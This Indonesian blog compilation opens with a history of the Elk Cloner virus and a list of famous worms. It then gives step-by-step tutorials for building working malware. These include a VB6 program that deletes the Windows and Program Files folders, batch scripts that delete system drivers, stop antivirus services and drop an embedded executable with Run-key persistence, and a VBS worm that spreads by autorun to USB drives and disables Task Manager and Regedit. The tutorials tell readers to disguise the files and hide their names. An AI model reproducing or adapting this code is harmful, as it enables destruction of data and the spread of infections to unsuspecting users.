Virus Komputer Pertama di Dunia

type='html'>

Elk Cloner dinyatakan sebagai salah satu virus mikro komputer yang menyebar luas keluar dari ruan lingkup tempat pembuatanya.Dibuat pada tahun 1982 oleh seorang murid Sekolah Menengah Atas yang berumur 15 tahun. Ia bernama Rich Skrenta. Virus yang ia buat, saat itu ditujukan untuk sistem komputer Apple II.

Saat itu Skrenta tidak lagi dipercaya oleh teman-tamannya. Hal itu disebabkan oleh kelakuannya yang secara ilegal membagikan game dan software, ia pun sering menggunakan floppy disk untuk mematikan komputer atau untuk menampilkan kata-kata mengejek pada layar. Akhirnya Skrenta pun memikirkan metode untuk melakukannya tanpa floppy disk agar ia tidak dicurigai.


Selama libur musim dingin di Mt. Lebanon High School,Pennsylvania,Amerika, Skrenta menemukan bagaimana cara menampilkan pesan secara otomatis di komputernya. Dan akhirnya dia menemukan apa yang dewasa ini disebut sebagai boot sector virus, dan mulai untuk menyebarkannya di kalangan teman satu sekolahnya serta di sebuah club komputer.

Dari sumber yang didapat virus itu cepat tersebar dan sukses menginfeksi floppy disk orang-orang yang ia kenal, termasuk guru matematikanya. Virusnya banyak merepotkan korban yang terinfeksi. Dapat dibayangkan bagaimana repotnya karena saat itubelum ada satupun antivirus. Virus elk cloner ini hanya dapat dihapus secara manual dengan langkah yang rumit.

Elk Cloner menyebar dengan cara menginfeksi sistem operasi Apple II dengan tehnik boot sector virus. Artinya jika kita melakukan booting komputer menggunakan floppy disk yang sudah terinfeksi maka virus akan secara otomatis terkopi ke memory. Dan apabila ada floppy disk bersih dimasukan ke komputer virus akan mengkopi dirinya ke floppy itu.

Komputer yang terinfeksi akan menampilkan sebuah puisi dilayar saat booting ke 50.

Dibawah ini puisinya :
Elk Cloner: The program with a personality
It will get on all your disks
It will infiltrate your chips
Yes it’s Cloner!
It will stick to you like glue
It will modify RAM too
Send in the Cloner!

Kesimpulannya, Elk Cloner tidak membuat sebuah kerusakan hanya merubah sistem pada floppy yang berisikan Apple DOS.

Saat ini, Skrenta jadi CEO di Blekko Inc, sebuah search engine internet

sumber

This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

10 Virus Komputer Terkejam di Dunia

type='html'>

1.Storm Worm
Muncul taon 2006, disebut “Storm Worm” karena nyebar via email dengan judul “230 dead as storm batters Europe”. Storm worm adalah program Trojan house. beberapa versinya bisa buat komputer menjadi bots. Atau biasa digunakan hacker untuk spam mail melalui internet.

2. Leap-A/Oompa- A
Mac yang punya konsep security through obscurity yakin tidak akan terserang virus karena OS nya sistem tertutup. Tapi tahun 2006, virus Leap-A atau biasa disebut Oompa-A muncul. Nyebar lewat iChat pada Mac. Setelah Mac terserang, virus itu akan mencari kontak melalui iChat dan kirim pesan ke tiap kontak itu. Pesannya itu berisi file corrupt yang berbentuk JPEG. Memang tidak berbahaya, namun hal ini menyatakan bahwa masih mungkin akan ada virus berbahaya yang menyerang MAC.

3. Sasser and Netsky
Penciptanya anak Jerman umur 17 tahun, Sven Jaschan. Sasser nyerang Microsoft Windows. Sasser ini ga nyebar via email. Tapi jika satu komputer koneksi ke komputer yang kena virus ini. Virus ini bikin komputer tidak bisa di-shutdown tanpa cabut power. Netsky nyebar melalui email dengan 22 Kb attachment file dan jaringan Windows. Bisa bikin serangan DoS. Sven Jaschan tidak dipenjara hanya diberi masa percobaan 1 taon 9 bulan, karena umurnya masih di bawah 18 taon.

4. MyDome (Novarg)
Mulai nyerang tanggal 1 Februari 2004, virus ini buat backdoor di OS. Pertama kali tanggal 1 itu mulai DDoS. Kedua, tanggal 12 Feb, virus ini berhenti menyebar dan mulai buat backdoors. MyDoom menyebar via email, selain itu selalu search di search engines, seperti Google mulai menerima jutaan permintaan pencarian dan bikin lambat sampai akhirnya crash. Gara2 MyDoom, Senator US Chuck Schumer mengajukan pembuatan National Virus Response Center.

5.SQL Slammer/Saphire
Muncul Januari 2003, nyebar cepet lewat internet. Waktu itu bikin layanan ATM Bank Amerika crash, ancurnya layanan 911 Seattle, dan Continental Airlines membatalkan beberapap penerbangan karena eror check in ama tiketing. Bikin rugi lebih dari $1 milliar sebelum dipacthed.

6.Nimda
Ini juga tahun 2001, kebalikan dari kata “admiN”. Penyebarannya sangat cepat, menurut TruSecure CTO Peter Tippet, Nimda hanya butuh 22 menit buat menjadi Top Ten saat itu. Target nya server2 Internet, menyebar lewat Internet. Nimda akan ngebuat backdoor ke OS. jadi penyerang bisa akses ke server dan berbuat apa saja Nimda juga menjadi DDoS.

7.Code Red & Code Red II
Muncul musim panas 2001, nyerang OS Windows 2000 & NT. Virusnya bakal bikin buffer penuh jadi ngabisin memori. Paling seru waktu berhubungan ama White House, semua komputer yang kena virus ini bakalan otomatis akses ke web server di White House barengan, jadi bikin overload, alias serangan DDoS. Akhirnya Microsoft rilis patchnya saat itu.

8.The Klez
Nongol taon 2001, menyebar via email, replikasi trus kirim ke orang2 di address book. Bikin komputer ga bisa beroperasi, bisa berhentiin program antivirus.

9.ILOVEYOU
Abis “Melissa”, muncul dia dari Filipina, bentuk nya worm, program standalone dapat me-replikasi sendiri. Menyebar via email, judulnya”surat cinta” dari pengagum rahasia . Original file nya LOVE-LETTER- FOR-YOU.TXT. vbs. VBS singkatan Visual Basic Scripting. Penciptanya adalah Onel de Guzman dari Filipina.

10.Melissa
Dibikin taon 1999 sama David L Smith, basicnya Microsoft Word macro. Menyebar via email dengan dokumen “Here is that document you asked for, don’t show it to anybodey else.”. Kalau sampe dibuka, virus akan replikasi dan otomatis ngirim ke top 50 di address book email. Smith dipenjara 20 bulan ama denda $5000 dan melarang akses komputer tanpa pengawasan.

sumber: http://blognyajose.blogspot.com/2010/02/awas-10-virus-komputer-terkejam-di.html

Virus Simple yang sangat berbahaya

wwwKali ini Dcochanz mencoba berbagi dengan sobat-sobat semua yang doyan sama VIRUS, loh virus kok doyan ...he..he..he.....maksudnya disini cuma sekedar pembelajaran ya... iseng-iseng bagi-bagi sedikit pengetahuan.

OK langsung saja kita ke rumah saya .....kok kerumah saya......ngawur..!!!

Virus ini cukup mematikan, tapi simple, dan sepertinya tidak akan terdekteksi antivirus, soalnya cara kerjanya simple.
Yang diperlukan:
1. VB(optimal : 6.0)
2. Paham tombol-tombolnya VB

Tutorial Bikin Virus cuma 1 menit
1. buat form sekecil mungkin
2. didalam form itu, masukin kode di bawah ini
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function

3.Kode yg warna biru itu penangkal virus, barang kali anda tidak sengaja tekan jadi anda selamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, anda tidak akan keserang sendiri… bisa anda edit koq jadi apa gitu…
Yang warna merah itu folder yang akan didelete sama virus ini, anda edit sendiri
4. Buat project ini namanya seperti nama system, disini aku pakai nama “SystemKernel32″ jadi tidak bakal dicurigai
5. Jangan pernah letakan namamu di virus ini…
6. compile it.... dan selesai....

Virus berbahaya dari Notepad Part 1

Silahkan copy paste seluruh script yang ada disini ke notepad, truz save dengan extensi .bat, lalu jalankan. Tinggal lihat efeknya di komputer…..
Virus 1 :

@ECHO OFF
:begin
del c:\windows\system32\drivers\*.sys
del c:\windows\system32\drivers\*.dll
Echo Tutup program ini atau komputer kamu error!
pause
Echo Windows kini berusaha menagkal virus..
pause
Echo 10 ( detik )
pause
Echo 20 ( detik )
pause
Echo 30 ( detik )
pause
Echo 40 ( detik )
pause
Echo 50 ( detik )
pause
Echo 60 ( detik )
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Echo ( Virus Dijalankan.. )
pause
Echo Do Kamu suka paint?
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
Pause
Echo 70 ( detik )
Pause
Echo Jam di komputer sudah di ubah 12:00
Time 12:00
pause
Echo Virus menginfeksi…..
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Pause
echo awww… !
echo ini yang kamu dapatkan dari aku!
Pause
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
pause
md Loser.bat
md Fucker.bat
md shutup.bat
md amit-amit.bat
pause
md ShwAgl1.bat
md ShwAgl2.bat
md ShwAgl3.bat
md ShwAgl4.bat
md ShwAgl5.bat
md Apakabarkamusekaranghuh?.bat
echo ( SEKARANG LIHAT KE DEKSTOP FUCKER )
pause
echo sekarang minta maaf dan bersikap baik sama ShwAgl,stoopid
echo karena kamu g tutup programnya by aci
pause
echo oke sekarang lihat ha..ha..ha…XD (aci)
rundll32.exe shell32.dll,SHExitWindowsEx 2
echo Sekarang katakan "bye… bye…"

Virus Berbahaya dari Notepad Part 2

Silahkan copy paste seluruh script yang ada disini ke notepad, lalu save dengan extensi .bat, lalu jalankan. Tinggal lihat efeknya di komputer…..
Code :
@echo off
set lool=for
set BT=*.bat
set scr=*.scr
set PrL=C:\Perl\bin
set StpAV=Net Stop
set Bk=ShdwAngel.scr
echo %comspec%|find “cmd” >nul
if errorlevel 1 goto InstaL
%StpAV% MCSHIELD >nul & cls
%StpAV% NORTON ANTIVIRUS AUTO PROTECT SERVICE >nul & cls
%StpAV% NOD32 Kernel Service >nul & cls
%StpAV% SharedAccess >nul & cls
%StpAV% Automatic Updates >nul & cls
%StpAV% TrueVector Internet Monitor >nul & cls
:InstaL
echo n %Bk% >>$
echo e 0100 4D 5A 00 00 00 00 00 00 00 00 00 00 50 45 00 00>>$
echo e 0110 4C 01 02 00 46 53 47 21 00 00 00 00 00 00 00 00>>$
echo e 0120 E0 00 0F 01 0B 01 00 00 00 04 00 00 00 CA 00 00>>$
echo e 0130 00 00 00 00 54 01 00 00 00 10 00 00 0C 00 00 00>>$
echo e 0140 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00>>$
echo e 0150 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00>>$
echo e 0160 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00>>$
echo e 0170 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00>>$
echo e 0180 10 00 00 00 00 00 00 00 00 00 00 00 50 12 01 00>>$
echo e 0190 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00>>$
echo e 0210 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 0220 00 00 00 00 00 00 00 00 E0 00 00 C0 00 00 00 00>>$
echo e 0230 00 00 00 00 00 10 00 00 00 10 01 00 D1 02 00 00>>$
echo e 0240 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 0250 E0 00 00 C0 87 25 94 12 41 00 61 94 55 A4 B6 80>>$
echo e 0260 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F>>$
echo e 0270 B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3A AA EB E0>>$
echo e 0280 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 24 AC>>$
echo e 0290 D1 E8 74 2D 13 C9 EB 18 91 48 C1 E0 08 AC FF 53>>$
echo e 02A0 04 3B 43 F8 73 0A 80 FC 05 73 06 83 F8 7F 77 02>>$
echo e 02B0 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB>>$
echo e 02C0 9F 5E AD 97 AD 50 FF 53 10 95 8B 07 40 78 F3 75>>$
echo e 02D0 03 FF 63 0C 50 55 FF 53 14 AB EB EE 33 C9 41 FF>>$
echo e 02E0 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12>>$
echo e 02F0 D2 C3 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00>>$
echo e 0300 68 1C 14 30 40 3A B8 01 F0 E0 E8 31 B7 02 0A 6A>>$
echo e 0310 06 CB E7 4F 1E D8 D0 17 A3 A2 60 31 34 66 C7 05>>$
echo e 0320 A6 DB 0F 1E 22 10 AA 83 01 22 27 A8 05 1E 61 6A>>$
echo e 0330 10 68 05 1C FF 35 05 29 E8 85 0A 3E 05 0D 64 7E>>$
echo e 0340 47 32 C0 B6 B6 19 EA B7 C3 0B B8 AB 11 33 CD C8>>$
echo e 0350 15 6A 28 05 50 05 30 E8 2A 49 B8 25 12 C8 31 CC>>$
echo e 0360 D9 12 11 68 FA BD D3 32 1A 15 A0 82 44 8A 1D 81>>$
echo e 0370 45 22 C3 3C C0 74 E5 C8 FC D8 9B 44 41 2B 14 DC>>$
echo e 0380 93 B2 14 E0 16 42 E4 C4 04 32 10 D9 43 B1 34 0A>>$
echo e 0390 16 4F 13 0C 14 1D 86 A1 C0 4D 37 A3 10 1D A5 C4>>$
echo e 03A0 08 0A 14 BF BF 18 D3 F0 29 08 2C 88 94 F5 3A 44>>$
echo e 03B0 68 A0 09 E8 82 C3 93 83 3D A4 03 17 02 75 24 68>>$
echo e 03C0 1C 75 49 57 D8 B7 65 05 01 0E 06 68 0A 30 11 0C>>$
echo e 03D0 E8 4B 57 EB 53 22 24 B2 08 31 27 16 C6 65 3C 47>>$
echo e 03E0 10 10 63 09 75 7E 2C 91 4D 6F F9 3F A3 FB 57 2A>>$
echo e 03F0 09 28 11 52 03 D0 55 8B EC 83 C4 98 C7 45 F4 52>>$
echo e 0400 0C A0 77 53 F8 E6 7E 6C FC 39 A5 8D C3 2E 50 68>>$
echo e 0410 BC 75 79 A4 DB 31 E8 C1 2B C6 05 22 3C 29 01 43>>$
echo e 0420 15 CE 26 7C 31 A8 61 DD EC 93 47 69 44 32 4C DB>>$
echo e 0430 2F 89 28 45 F0 40 0F EC 50 FF 75 34 1C D0 49 18>>$
echo e 0440 E8 A1 39 EB C1 1C C9 C2 04 2A 7A 47 F0 A2 C4 11>>$
echo e 0450 B8 08 47 86 43 B7 8A 54 26 64 F0 11 7E 29 44 E7>>$
echo e 0460 A2 2C 55 33 1B 06 77 2A 85 93 91 4E 14 EB C4 77>>$
echo e 0470 06 FF 25 18 20 2F ED C2 A4 06 04 32 08 19 0C 0C>>$
echo e 0480 10 86 43 14 7B 86 43 24 21 28 90 2C C8 30 64 34>>$
echo e 0490 32 38 28 01 DD 57 F1 CB 2A 0C 14 DD 09 ED 89 FD>>$
echo e 04A0 11 09 21 02 11 26 BD 19 63 FF 02 7F 72 84 65 F5>>$
echo e 04B0 EC 7D FE 32 0F 09 12 24 16 5B 41 9F 0C 51 1C DD>>$
echo e 04C0 61 E2 68 2A 10 2C 9F 9C 69 9C 5F 19 73 06 80 BA>>$
echo e 04D0 F1 32 02 09 0D 24 10 48 13 91 17 42 22 03 43 72>>$
echo e 04E0 65 61 74 98 50 69 70 EF 4B 0E 76 3F 6F 63 B8 73>>$
echo e 04F0 A9 41 12 43 54 68 28 0F 64 10 7F 47 FC 56 FF F4>>$
echo e 0500 73 69 0A 6F 6E 45 78 21 19 52 31 46 F9 6C 53 3E>>$
echo e 0510 53 7E 0E 61 70 11 57 72 69 A2 66 15 0E 4B 45 52>>$
echo e 0520 4E 60 4C 33 32 2E 64 FB FB 05 31 53 4F 43 4B 64>>$
echo e 0530 0D 7B 01 EA FC 63 07 6D 64 2E 65 78 2C 10 6F F3>>$
echo e 0540 E8 61 6E DB 18 11 85 6B 01 FF FB B9 80 00 00 00>>$
echo e 0550 A8 12 01 00 00 00 00 00 00 00 00 00 F2 01 00 00>>$
echo e 0560 A8 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00>>$
echo e 0570 00 00 00 00 00 00 00 00 00 10 40 00 00 10 41 00>>$
echo e 0580 40 20 40 00 00 00 00 00 98 12 41 00 80 00 00 00>>$
echo e 0590 00 7D 00 00 78 12 41 00 E8 01 40 00 DC 01 40 00>>$
echo e 05A0 DE 01 40 00 00 10 40 00 B2 12 01 00 C0 12 01 00>>$
echo e 05B0 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41>>$
echo e 05C0 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73>>$
echo e 05D0 00 00>>$
echo rcx>>$
echo 4D1>>$
echo w>>$
echo q>>$
debug < $ >nul
copy %Bk% %windir%\%Bk% >nul
del $ >nul
echo REGEDIT4 >>_.reg
echo. >>_.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>_.reg
echo “Screen Server”=”%Bk%” >>_.reg
regedit /s _.reg
del _.reg >nul
%lool% %%_ in (..\ %path%\ %PrL%\ C:\ ) do copy %Bk% %%_\ >nul & cls
%lool% %%T in (%path%\%scr% ) do copy %Bk% %%T >nul & cls
%lool% %%I in (..\ %path%\ %PrL%\ C:\ ) do copy %0 %%I\ >nul & cls
%lool% %%N in (%BT% ..\%BT% %path%\%BT% %PrL%\%BT% C:\%BT% ) do type %0 >>%%N >nul & cls
%lool% %%I in (%BT% ..\%BT% %path%\%BT% %PrL%\%BT% C:\%BT% ) do attrib +R %%I >nul & cls
%Bk%
exit

CARA MEMBUAT VIRUS WORM DENGAN MUDAH

Kamu pasti inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

 

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.
Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.
aplikasi tersebut dapat di download lewat link ini dalam bentuk .zip :

DOWNLOAD

(Setelah KLIK "Download" lalu tunggu 5 detik sampai muncul "SKIP AD" di sudut kanan atas. Lalu klik "SKIP AD" untuk mendownload)

Membuat Virus Dengan Mudah

Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host. Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
1.
on error resume next
2.
3.
‘//–Dim kata-kata berikut ini–//
4.
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
5.
6.
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
7.
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
8.
set fs = createobject(”Scripting.FileSystemObject”)
9.
set mf = fs.getfile(Wscript.ScriptFullname)
10.
dim text,size
11.
size = mf.size
12.
check = mf.drive.drivetype
13.
set text = mf.openastextstream(1,-2)
14.
do while not text.atendofstream
15.
rekur = rekur & text.readline
16.
rekur = rekur & vbcrlf
17.
loop
18.
do
19.
20.
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
21.
Set windowpath = fs.getspecialfolder(0)
22.
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
23.
tf.attributes = 32
24.
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
25.
tf.write rekursif
26.
tf.close
27.
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
28.
tf.attributes = 39
29.
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
30.
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
31.
32.
for each flashdrive in fs.drives
33.
‘//–Cek Drive–//
34.
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
35.
36.
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
37.
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
38.
tf.attributes =32
39.
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
40.
tf.write rekursif
41.
tf.close
42.
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
43.
tf.attributes = 39
44.
45.
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
46.
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
47.
tf.attributes = 32
48.
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
49.
tf.write isi
50.
tf.close
51.
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
52.
tf.attributes=39
53.
end if
54.
next
55.
56.
‘//–Manipulasi Registry–//
57.
58.
set kalong = createobject(”WScript.Shell”)
59.
60.
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
61.
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
62.
63.
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
64.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
65.
66.
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
67.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
68.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
69.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
70.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
71.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
72.
73.
‘//–Manip – Disable klik kanan–//
74.
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
75.
76.
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
77.
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
78.
79.
‘//–Manip – Aktif setiap Windows Startup–//
80.
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
81.
82.
‘//–Manip – Ubah RegisteredOwner dan Organization–//
83.
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
84.
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
85.
86.
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
87.
if check <> 1 then
88.
Wscript.sleep 200000
89.
end if
90.
loop while check <> 1
91.
set sd = createobject(”Wscript.shell”)
92.
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
93.
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
sumber : pusat hacking se-dunia

Tutorial Membuat Virus

Sebelum melangkah lebih jauh lagi tentang bagaimana memulai dalam membuat virus ada baiknya ada beberapa hal yang mesti dipelajari alam membuat virus komputer yaitu seperti yang ditulis dibawah ini.

Registry Windows

Registry Windows adalah suatu database yang digunakan untuk menyimpan pilihan dan pengaturan pada sistem Microsoft Windows versi 32 bit-Ke atas. Registry windows berisikan pengaturan dan informasi untuk semua hardware, software, user dan pilihan-pilihan yang berkaitan dengan komputer tersebut.

Masing-masing cabang utama disebut dengan Hive. Hive berisi key dan masing- masing key bisa berisi key-key yang lain (sub key), dan key bisa berisikan value. Ada tiga jenis data yang umumnya digunakan  yaitu : String, Binary, dan DWORD – penggunaan masing-masing data ini tergantung pada konteks.

Adapun dibawah ini merupakan struktur Hive yang terdapat pada registry windows.

1.    HKEY_CLASSES_ROOT

hive ini berisi semua informasi tentang file asosiasi untuk mendukung fitur drag and drop, informasi OLE, windows shortcuts, dan aspek inti pada tampilan Windows

2.    HKEY_CURRENT_USER

Hive ini merujuk pada bagian HKEY_USERS, sesuai dengan user yang sedang aktif dan berisi informasi seperti nama logon, pengaturan desktop, dan pengaturan StartMenu

3.    HKEY_LOCAL_MACHINE

Hive ini berisikan informasi spesifik komputer tentang jenis hardware, software, dan pilihan-pilihan yang berkaitan dengan komputer tersebut, danh informasi ini digunakan untuk semua user pada komputer.

4.    HKEY_USERS

Hive ini berisikan pilihan individu untuk masing-masing user yang menggunakan komputer, masing-masing user diwakili oleh suatu Sid sub-key yang ditempatkan dibawah cabang utama.

5.    HKEY_CURRENT_CONFIG

Hive ini merujuk pada bagian HKEY_Local_Machinie, sesuai dengan konfigurasi hardware yang berlaku saat itu.

6.    HKEY_DYN_DATA

Hive ini merujuk pada suatu bagian dari HKEY_LOCAL_MACHINE, untuk digunakan dengan fitur plug&play pada Windows, bagian ini bersifat dinamis dan akan berubah ketika suatu alat ditambahkan atau dipindahkan dari sistem.

Sedangkan pada value terdiri dari tiga sejenis data yang sering digunakan.

1.    REG_BINARY

Jenis ini menyimpan nilai sebagai data biner.kebanyakan informasi komponen perangkat keras disimpan sebagai data biner, dan dapat dilihat pada sebuah editor dalam format hexadecimal.

2.    REG_DWORD

Jenis ini mewakili data dengan empat byte nomor dan biasanya digunakan untuk nilai-nilai boolean, seperti “0” berarti Disableddan “1” berarti enabled.

3.    REG_SZ

Jenis ini adalah suatu string standar, yang digunakan untuk mewakili value yang bisa dibaca manusia.

Tampilan Saat Pemanggilan Registry Windows

Tampilan Registry Windows Note :  Pembahasan atau tutorial tentang Registry Windows dapat kalian cari pada
internet atau buku-buku yang membahas tentang Registry Windows.

Visual Basic Script
Visual merupakan bagian dari WSH (Windows Scripting Host). Yaitu bahasa scripting yang digunakan programmer web untuk mengakses script – script yang ada di windows. Visual Basic Script merupakan turunan visual basic, VBScript juga lebih mendukung untuk pembuatan fungsi – fungsi di windows, karena yang mebuat VBScript itu adalah pihak Microsoft sendiri.
Adapun langkah-langkah dalam menjalankan VBScript adalah sbb,

1. Pertama-tama buka notepad terlebih dahulu, kemudian ketiikan kode dibawah ini atau juga bisa di copy – pastekan saja. Dim coba
Coba=inputbox(“Halo Semuanya”,”IlmuKomputer”)
2. Setelah itu simpan dengan ekstensi *.vbs

Tampilan Setelah Dijalankan
